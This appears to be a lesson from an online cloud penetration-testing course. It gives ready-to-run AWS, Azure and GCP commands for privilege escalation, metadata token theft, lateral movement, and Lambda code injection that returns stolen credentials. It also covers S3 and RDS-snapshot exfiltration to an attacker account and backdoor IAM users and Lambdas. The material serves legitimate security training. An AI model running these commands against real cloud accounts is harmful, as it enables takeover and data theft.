Nerd Level Tech logo
|
Lesson 23 of 24

Cloud Pentesting & Assessment

Cloud Exploitation Techniques

4 min read

Understanding cloud-specific exploitation paths is essential for both offensive testing and defensive hardening. IAM policy abuse, privilege escalation, and lateral movement techniques differ significantly from traditional infrastructure attacks.

AWS Privilege Escalation

IAM-Based Escalation Paths

iam:PassRole + service creation:

# If you can pass roles and create Lambda
aws iam create-role --role-name EscalateRole --assume-role-policy-document file://trust.json

# Create Lambda with admin role
aws lambda create-function \
    --function-name escalate \
    --runtime python3.9 \
    --role arn:aws:iam::123456789012:role/AdminRole \
    --handler index.handler \
    --zip-file fileb://payload.zip

# Lambda code retrieves admin credentials via metadata

iam:CreatePolicyVersion:

# Create new policy version with admin permissions
aws iam create-policy-version \
    --policy-arn arn:aws:iam::123456789012:policy/TargetPolicy \
    --policy-document file://admin-policy.json \
    --set-as-default

iam:AttachUserPolicy / AttachRolePolicy:

# Attach AdministratorAccess
aws iam attach-user-policy \
    --user-name compromised-user \
    --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Common Escalation Vectors

Permission Escalation Path
iam:PassRole + lambda:CreateFunction Create Lambda with privileged role
iam:PassRole + ec2:RunInstances Launch EC2 with instance profile
iam:CreatePolicyVersion Modify policy to add permissions
iam:AttachUserPolicy Attach admin policy
iam:PutUserPolicy Add inline admin policy
sts:AssumeRole Assume more privileged role
lambda:UpdateFunctionCode Modify existing Lambda
ec2:ModifyInstanceAttribute Change instance userData

Automated Detection

# Pacu - AWS exploitation framework
python3 pacu.py

# Within Pacu:
> run iam__privesc_scan
> run iam__enum_permissions

Azure Privilege Escalation

Role Assignment Abuse

# If you have Owner or User Access Administrator
az role assignment create \
    --assignee user@domain.com \
    --role "Owner" \
    --scope /subscriptions/SUBSCRIPTION_ID

Service Principal Exploitation

# Create service principal with privileged access
az ad sp create-for-rbac \
    --name "attacker-sp" \
    --role Contributor \
    --scopes /subscriptions/SUBSCRIPTION_ID

# Use returned credentials
az login --service-principal \
    -u APP_ID \
    -p PASSWORD \
    --tenant TENANT_ID

Managed Identity Abuse

# From compromised VM/App Service with managed identity
# Get access token
curl -H "Metadata: true" \
    "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# Use token for ARM API calls
curl -H "Authorization: Bearer $TOKEN" \
    "https://management.azure.com/subscriptions?api-version=2020-01-01"

Azure AD Escalation

Privilege Escalation
Application.ReadWrite.All Create app with privileged API permissions
RoleManagement.ReadWrite.Directory Assign Global Admin
User.ReadWrite.All Modify user attributes
Group.ReadWrite.All Add self to privileged groups

GCP Privilege Escalation

Service Account Key Creation

# If you have iam.serviceAccountKeys.create
gcloud iam service-accounts keys create key.json \
    --iam-account admin-sa@project.iam.gserviceaccount.com

# Authenticate as service account
gcloud auth activate-service-account --key-file=key.json

setIamPolicy Abuse

# If you have setIamPolicy on project
gcloud projects set-iam-policy PROJECT_ID policy.json

# policy.json grants owner to attacker
{
  "bindings": [{
    "role": "roles/owner",
    "members": ["user:attacker@gmail.com"]
  }]
}

Impersonation

# If you can impersonate service accounts
gcloud auth print-access-token \
    --impersonate-service-account=admin@project.iam.gserviceaccount.com

Lateral Movement

AWS Cross-Account Access

# Enumerate assumable roles
aws iam list-roles \
    --query 'Roles[*].[RoleName,AssumeRolePolicyDocument]'

# Assume cross-account role
aws sts assume-role \
    --role-arn arn:aws:iam::TARGET_ACCOUNT:role/TrustedRole \
    --role-session-name lateral-movement

# Use new credentials
export AWS_ACCESS_KEY_ID=...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

Lambda Function Code Injection

# Modify existing Lambda function
cat > payload.py << 'EOF'
import boto3
import os

def handler(event, context):
    client = boto3.client('sts')
    creds = client.assume_role(
        RoleArn=os.environ['TARGET_ROLE'],
        RoleSessionName='injected'
    )
    # Exfiltrate credentials
    return creds['Credentials']
EOF

zip payload.zip payload.py
aws lambda update-function-code \
    --function-name target-function \
    --zip-file fileb://payload.zip

Kubernetes Service Account Token

# From compromised pod
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Use token to access API
kubectl --token=$TOKEN --server=https://kubernetes.default auth can-i --list
kubectl --token=$TOKEN get secrets -A

Data Exfiltration

S3 Bucket Exfiltration

# Copy entire bucket
aws s3 sync s3://target-bucket ./exfil/

# If bucket is public
aws s3 cp s3://target-bucket/sensitive.db ./exfil/ --no-sign-request

Database Snapshot Sharing

# Share RDS snapshot with attacker account
aws rds modify-db-snapshot-attribute \
    --db-snapshot-identifier target-snapshot \
    --attribute-name restore \
    --values-to-add ATTACKER_ACCOUNT_ID

# In attacker account, restore snapshot
aws rds restore-db-instance-from-db-snapshot \
    --db-instance-identifier stolen-db \
    --db-snapshot-identifier arn:aws:rds:region:VICTIM:snapshot:target-snapshot

Persistence Techniques

IAM User/Access Key Creation

# Create backdoor user
aws iam create-user --user-name service-automation

# Create access keys
aws iam create-access-key --user-name service-automation

# Attach permissions
aws iam attach-user-policy \
    --user-name service-automation \
    --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Lambda Backdoor

# Create persistent Lambda triggered by CloudWatch Events
aws events put-rule \
    --name backdoor-trigger \
    --schedule-expression "rate(1 day)"

aws lambda add-permission \
    --function-name backdoor \
    --statement-id events \
    --action lambda:InvokeFunction \
    --principal events.amazonaws.com

aws events put-targets \
    --rule backdoor-trigger \
    --targets "Id"="1","Arn"="arn:aws:lambda:region:account:function:backdoor"

Exploitation Checklist

Phase AWS Azure GCP
Priv Esc PassRole, CreatePolicyVersion Role assignments, Managed Identity setIamPolicy, SA keys
Lateral AssumeRole, Lambda injection Service principals Impersonation
Persist IAM users, Lambda App registration SA keys
Exfil S3 sync, snapshot share Blob download gsutil

Next, we'll explore cloud security assessment tools and frameworks. :::

Quiz

Module 6: Cloud Pentesting & Assessment

Take Quiz